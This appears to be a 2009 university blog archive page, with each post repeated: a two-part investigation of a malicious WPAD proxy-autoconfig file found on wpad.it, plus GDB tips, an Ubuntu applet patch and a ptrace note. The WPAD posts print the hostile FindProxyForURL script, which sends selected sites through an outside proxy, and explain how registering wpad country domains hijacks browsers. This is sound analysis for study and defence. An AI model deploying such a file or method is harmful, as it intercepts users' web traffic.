Archive for May, 2009
The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II
Posted by Luca Invernizzi in Security on May 14, 2009
After reading Jacopo’s article on WPAD, I’ve tried to understand the Italian global wpad.it/wpad.dat:
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; } |
The proxy
First thing that concerned me is that the IP address used as proxy is polish:
$host 72.55.164.182
182.164.55.72.in-addr.arpa domain name pointer wpad.pl
It’s registered to a guy in Wloclawek, and it’s been up since December 2008, so it’s pretty new. The hosted site is syndacated, which it’s usually a fishy sign.
The syntax
The scripts provides a fall back policy to direct connection to avoid server overload, as described in wikipedia
return "PROXY 72.55.164.182:80; DIRECT" |
The regular expression
I’ve downloaded Alexa top 1-million sites list, which is daily updated, and I discovered that the second regular expression,
"http*//*s*st*mp*tn*sk*p*" |
gets one and only one match: a polish internet trading site.
$cat top-1m.csv |sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p" 154967,systempartnerski.pl |
The first regular expression, even without the initial and final part, does not match any site in Alexa first million.
The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part II
Posted by Luca Invernizzi in Security on May 14, 2009
After reading Jacopo’s article on WPAD, I’ve tried to understand the Italian global wpad.it/wpad.dat:
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; } |
The proxy
First thing that concerned me is that the IP address used as proxy is polish:
$host 72.55.164.182
182.164.55.72.in-addr.arpa domain name pointer wpad.pl
It’s registered to a guy in Wloclawek, and it’s been up since December 2008, so it’s pretty new. The hosted site is syndacated, which it’s usually a fishy sign.
The syntax
The scripts provides a fall back policy to direct connection to avoid server overload, as described in wikipedia
return "PROXY 72.55.164.182:80; DIRECT" |
The regular expression
I’ve downloaded Alexa top 1-million sites list, which is daily updated, and I discovered that the second regular expression,
"http*//*s*st*mp*tn*sk*p*" |
gets one and only one match: a polish internet trading site.
$cat top-1m.csv |sed -ne "s/.*s.*st.*mp.*tn.*sk.*p.*/&/p" 154967,systempartnerski.pl |
The first regular expression, even without the initial and final part, does not match any site in Alexa first million.
The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I
Posted by Jacopo Corbetta in Security on May 13, 2009
The network here at Sant’Anna School of Advanced Studies is quite complicated, so sometimes the only way to solve a connectivity problem is to open Wireshark and start looking around. As you may know, Windows boxes are quite chatty and they love to send out NetBIOS broadcast packets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed something strange in the broadcast jam: a PC was continously trying to reach the inexistent WPAD.SSSUP.IT machine.
I got curious, looked up what WPAD is, and found a couple of interesting things.
What the heck is this WPAD thing?
It turns out Internet Explorer developers thought an organization might wish to set up elaborate rules for www proxying. Therefore, they devised a way for network admins to autoconfigure IE proxy settings: the Web Proxy Automatic Discovery Protocol (WPAD). All major browsers currently support this feature. Note that many applications on Windows default to following IE proxy settings, so the Man-In-The-Middle potential is very high.
Basically, the browser issues a request for http://wpad.yourdomain.com/wpad.dat 1, which should contain a Javascript-like function called FindProxyForURL. The function can use wildcard matching to specify different proxies for different addresses. All the gory details are available at www.findproxyforurl.com.
Exploiting WPAD
Things can get complicated if you have a subdomain (e.g. if your computer is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if someone hijacks one of your wpad names, sophisticated Man-In-The-Middle attacks are possible. Since network admins often forget to setup a wpad host for their domain, Windows may try to query in multiple ways — even by broadcasting a NetBIOS request, which is trivial to intercept on a local network.2
Now, auto-configuration of network parameters is very useful. Tools like DHCP and trasparent proxies are in wide use. However, this kind of auto-configuration brings risks: rogue DHCP servers can be transparent to users and possibly avoid detection. DHCP is a very well known protocol and network admins have long learnt to watch out for suspicious DHCP activity. WPAD is — in comparison — a somewhat obscure protocol. Buggy programs (and lax policies by domain registrars) create a sneaky exploit opportunity.
The DNS beast
As you might have guessed, Windows should stop short of the top-level domain .com in its quest for a wpad.dat. However, two issues come into play:
- On certain buggy versions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let’s hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level-Domains (TLDs) like wpad.cz or wpad.it?
- Some countries (like Italy) allow you to register domain names right under their national suffix (e.g. our beloved School has sssup.it). Other countries (the United Kingdom, for instance) chose to mimic the global TLD structure, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.
Combine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which is the TLD and which is the specific domain name. It is not immediately obvious, for instance, that pi.it is a global TLD (reserved for the italian province of Pisa) while sns.it is the site of our arch-rival, the infamous Scuola Normale Superiore.
There is no “good” solution to this problem. Mozilla developers ended up creting a list of “Effective TLDs“3 which the browser treats like global TLDs.
Each item on this list is an exploit opportunity for the WPAD bug. Just register the wpad.it domain and you potentially have control of all buggy machines with a .it name
Attack on Italy: the wpad.it mistery
You might think registrars would think twice before assigning a “wpad.country” domain. It turns out that sometimes this is not the case.
Some global wpad domains do exist and many of them serve a malicious wpad.dat. I’m gathering data and I’ll post when I have enough to make an interesting summary.
But take a look at this, the global wpad.it/wpad.dat:
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; } |
What the hell is this? It appears the attacker is targeting some specific websites, but the wildcard is quite complicated. Any idea of what it might be?
UPDATE: found this same file on wpad.cz, full analysis in progress.
UPDATE: a more in depth analysis here and here
- Windows can also read its settings from DHCP and even from a special DNS entry. The official Microsoft documentation is somewhat sparse, but detailed information can be found in the draft submitted for standardization (previous version), inTechNet, in some knowledge base articles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a different format. [↩]
- Even when a WINS server is present, naming your computer WPAD.YOURDOMAIN.COM might do the trick. [↩]
- Browsers need this list to enforce cookie restrictions (what if someone was able a cookie on all “.co.uk” domains?). The list is now publicly maintained at publicsuffix.org. [↩]
The misterious Web Proxy Automatic Discovery (WPAD) Italian exploit — Part I
Posted by Jacopo Corbetta in Security on May 13, 2009
The network here at Sant’Anna School of Advanced Studies is quite complicated, so sometimes the only way to solve a connectivity problem is to open Wireshark and start looking around. As you may know, Windows boxes are quite chatty and they love to send out NetBIOS broadcast packets to resolve names, elect popes, fight back with anti-popes, and so on. But this time I noticed something strange in the broadcast jam: a PC was continously trying to reach the inexistent WPAD.SSSUP.IT machine.
I got curious, looked up what WPAD is, and found a couple of interesting things.
What the heck is this WPAD thing?
It turns out Internet Explorer developers thought an organization might wish to set up elaborate rules for www proxying. Therefore, they devised a way for network admins to autoconfigure IE proxy settings: the Web Proxy Automatic Discovery Protocol (WPAD). All major browsers currently support this feature. Note that many applications on Windows default to following IE proxy settings, so the Man-In-The-Middle potential is very high.
Basically, the browser issues a request for http://wpad.yourdomain.com/wpad.dat 1, which should contain a Javascript-like function called FindProxyForURL. The function can use wildcard matching to specify different proxies for different addresses. All the gory details are available at www.findproxyforurl.com.
Exploiting WPAD
Things can get complicated if you have a subdomain (e.g. if your computer is called bob.office.yourdomain.com then wpad.office.yourdomain.com is tried too), but the key point is the same: if someone hijacks one of your wpad names, sophisticated Man-In-The-Middle attacks are possible. Since network admins often forget to setup a wpad host for their domain, Windows may try to query in multiple ways — even by broadcasting a NetBIOS request, which is trivial to intercept on a local network.2
Now, auto-configuration of network parameters is very useful. Tools like DHCP and trasparent proxies are in wide use. However, this kind of auto-configuration brings risks: rogue DHCP servers can be transparent to users and possibly avoid detection. DHCP is a very well known protocol and network admins have long learnt to watch out for suspicious DHCP activity. WPAD is — in comparison — a somewhat obscure protocol. Buggy programs (and lax policies by domain registrars) create a sneaky exploit opportunity.
The DNS beast
As you might have guessed, Windows should stop short of the top-level domain .com in its quest for a wpad.dat. However, two issues come into play:
- On certain buggy versions, the global wpad.com/wpad.dat is requested. Now, the wpad.com domain has been taken by a (let’s hope) good guy, who chose not to serve a wpad.dat. But what about other Top-Level-Domains (TLDs) like wpad.cz or wpad.it?
- Some countries (like Italy) allow you to register domain names right under their national suffix (e.g. our beloved School has sssup.it). Other countries (the United Kingdom, for instance) chose to mimic the global TLD structure, so their addresses look like google.co.uk, ox.ac.uk, and so on. Some even mix the two policies.
Combine these two facts, and you get a big mess. Issue #2 means that when you see a domain name it is very hard to tell which is the TLD and which is the specific domain name. It is not immediately obvious, for instance, that pi.it is a global TLD (reserved for the italian province of Pisa) while sns.it is the site of our arch-rival, the infamous Scuola Normale Superiore.
There is no “good” solution to this problem. Mozilla developers ended up creting a list of “Effective TLDs“3 which the browser treats like global TLDs.
Each item on this list is an exploit opportunity for the WPAD bug. Just register the wpad.it domain and you potentially have control of all buggy machines with a .it name
Attack on Italy: the wpad.it mistery
You might think registrars would think twice before assigning a “wpad.country” domain. It turns out that sometimes this is not the case.
Some global wpad domains do exist and many of them serve a malicious wpad.dat. I’m gathering data and I’ll post when I have enough to make an interesting summary.
But take a look at this, the global wpad.it/wpad.dat:
function FindProxyForURL(url, host) { //regular expression/complexity supported? if ( (shExpMatch(url, "http://*g*ad*nd*c*m*sh*ds*js")) || (shExpMatch(url, "http*//*s*st*mp*tn*sk*p*") && !shExpMatch(url, "http*//*n*o.*")) ) { return "PROXY 72.55.164.182:80; DIRECT"; } return "DIRECT"; } |
What the hell is this? It appears the attacker is targeting some specific websites, but the wildcard is quite complicated. Any idea of what it might be?
UPDATE: found this same file on wpad.cz, full analysis in progress.
UPDATE: a more in depth analysis here and here
- Windows can also read its settings from DHCP and even from a special DNS entry. The official Microsoft documentation is somewhat sparse, but detailed information can be found in the draft submitted for standardization (previous version), inTechNet, in some knowledge base articles, and of course on Wikipedia. Another file which can be requested is wspad.dat, which has a different format. [↩]
- Even when a WINS server is present, naming your computer WPAD.YOURDOMAIN.COM might do the trick. [↩]
- Browsers need this list to enforce cookie restrictions (what if someone was able a cookie on all “.co.uk” domains?). The list is now publicly maintained at publicsuffix.org. [↩]
Three GDB tricks for the masses
Posted by Alessandro Pignotti in Coding tricks on May 8, 2009
The GNU Debugger is a very powerful and fearsome beast. It seems that I’ve found a couple of useful tricks which are not popular as they should.
- The watch command: any script kiddie knows about breakpoints. Watchpoints are based on the same concept applied to not to code, but to data memory. You can set a watchpoint on a variable using the following syntax:
watch var.
It is also possible to watch a specific memory address with the syntax:watch *0xdeadbeaf
. A watchpoint triggers when the contents of the memory location changes, so they are useful when trying to find out when a variable is modified. (remember that in C++ you should always use private and protected sections to stop variables from being accessed/modified outside the expected code flow). It is also possible to set read watchpoints using the rwatch command, which triggers when the location is accessed. This feature is mainly useful when reverse engineering compiled code, to find out which code path make use/are influenced by a certain variable/memory location. The major drawback of watchpoints is that common hardware support only a few of them. When gdb runs out of hardware watchpoints it resorts to software emulation, which is very slow, and not possible at all for the read ones. This also means that putting watchpoints on big structures and classes is highly discorauged. - set print object: If you’ve ever made extensive use of polymorphic classes or otherwise complex class hierarchies, you will find this setting very useful. The print command, when printing pointers of base classes, will take look at the virtual table to find out the actual object type, and print it beside the address. Moreover when dereferencing pointers it will print the full object contents, not only the base class members.
- info threads command: When you face a deadlock in your multithreaded code, the first step to understand the problem is to find out which threads are blocked. The deadlock is often not easily reproducible, so should at first attach gdb the the process using the attach <pid> command, the typing info threads you will get for each thread the function name where it is currently stopped. Threads involved in a deadlock conditions are usually stopped in sem_wait or similar semaphore related functions
Well... I guess I’m using gdb way too much, maybe I’m not a good programmer
Three GDB tricks for the masses
Posted by Alessandro Pignotti in Coding tricks on May 8, 2009
The GNU Debugger is a very powerful and fearsome beast. It seems that I’ve found a couple of useful tricks which are not popular as they should.
- The watch command: any script kiddie knows about breakpoints. Watchpoints are based on the same concept applied to not to code, but to data memory. You can set a watchpoint on a variable using the following syntax:
watch var.
It is also possible to watch a specific memory address with the syntax:watch *0xdeadbeaf
. A watchpoint triggers when the contents of the memory location changes, so they are useful when trying to find out when a variable is modified. (remember that in C++ you should always use private and protected sections to stop variables from being accessed/modified outside the expected code flow). It is also possible to set read watchpoints using the rwatch command, which triggers when the location is accessed. This feature is mainly useful when reverse engineering compiled code, to find out which code path make use/are influenced by a certain variable/memory location. The major drawback of watchpoints is that common hardware support only a few of them. When gdb runs out of hardware watchpoints it resorts to software emulation, which is very slow, and not possible at all for the read ones. This also means that putting watchpoints on big structures and classes is highly discorauged. - set print object: If you’ve ever made extensive use of polymorphic classes or otherwise complex class hierarchies, you will find this setting very useful. The print command, when printing pointers of base classes, will take look at the virtual table to find out the actual object type, and print it beside the address. Moreover when dereferencing pointers it will print the full object contents, not only the base class members.
- info threads command: When you face a deadlock in your multithreaded code, the first step to understand the problem is to find out which threads are blocked. The deadlock is often not easily reproducible, so should at first attach gdb the the process using the attach <pid> command, the typing info threads you will get for each thread the function name where it is currently stopped. Threads involved in a deadlock conditions are usually stopped in sem_wait or similar semaphore related functions
Well... I guess I’m using gdb way too much, maybe I’m not a good programmer
Picking windows
Posted by Luca Invernizzi in Ubuntu on May 4, 2009
The Window Picker Applet is an GNOME applet (developed at Canonical) that displays the list of running applications and allows you to switch between them. It’s a default applet in Ubuntu-netbook-remix, since on netbooks the screen real estate is essential.
It’s a nice little applet, but unfortunately does not work well with vertical panels, since it tries to display the icon list of the running applications horizontally (see this bug). I’ve developed a patch to window-picker-applet-0.4.22 that solves this issue.
To use it, do as follows:
apt-get source window-picker-applet cd window-picker-applet-0.4.22 patch -p1 < $PATH_TO_THE_PATCH_FILE |
and then the usual:
./configure cd src && make && sudo make install killall gnome-panel |
Note that this patch *needs* gnome-panel to be restarted, since the panel orientation is chosen at initialization (I’ve not implemented yet the orientation change during execution).
Download the patch from here.
Picking windows
Posted by Luca Invernizzi in Ubuntu on May 4, 2009
The Window Picker Applet is an GNOME applet (developed at Canonical) that displays the list of running applications and allows you to switch between them. It’s a default applet in Ubuntu-netbook-remix, since on netbooks the screen real estate is essential.
It’s a nice little applet, but unfortunately does not work well with vertical panels, since it tries to display the icon list of the running applications horizontally (see this bug). I’ve developed a patch to window-picker-applet-0.4.22 that solves this issue.
To use it, do as follows:
apt-get source window-picker-applet cd window-picker-applet-0.4.22 patch -p1 < $PATH_TO_THE_PATCH_FILE |
and then the usual:
./configure cd src && make && sudo make install killall gnome-panel |
Note that this patch *needs* gnome-panel to be restarted, since the panel orientation is chosen at initialization (I’ve not implemented yet the orientation change during execution).
Download the patch from here.
Fun with ptrace: system emulation
Posted by Alessandro Pignotti in Coding tricks on May 4, 2009
The more I explore the interfaces deeply hidden in the linux kernel, the more a new world of opportunity opens. Today, while taking a look at the ptrace API, I found out the PTRACE_SYSEMU option.
But what is ptrace? It’s a kernel interface to check and manipulate the information that crosses the user space-kernel space frontier. Its main... principal... only user is gdb usually. The PTRACE_SYSEMU option is quite peculiar, it was implemented mainly for the user mode linux project. It allows not only to monitor the system calls invoked by a process, but also to replace the system call sematics.
So... how could this be useful? For example to experiment with different auditing/sandboxing strategies, or to build compatility layers at the system call level... but who knows what kind of funny things could be done!
Fun with ptrace: system emulation
Posted by Alessandro Pignotti in Coding tricks on May 4, 2009
The more I explore the interfaces deeply hidden in the linux kernel, the more a new world of opportunity opens. Today, while taking a look at the ptrace API, I found out the PTRACE_SYSEMU option.
But what is ptrace? It’s a kernel interface to check and manipulate the information that crosses the user space-kernel space frontier. Its main... principal... only user is gdb usually. The PTRACE_SYSEMU option is quite peculiar, it was implemented mainly for the user mode linux project. It allows not only to monitor the system calls invoked by a process, but also to replace the system call sematics.
So... how could this be useful? For example to experiment with different auditing/sandboxing strategies, or to build compatility layers at the system call level... but who knows what kind of funny things could be done!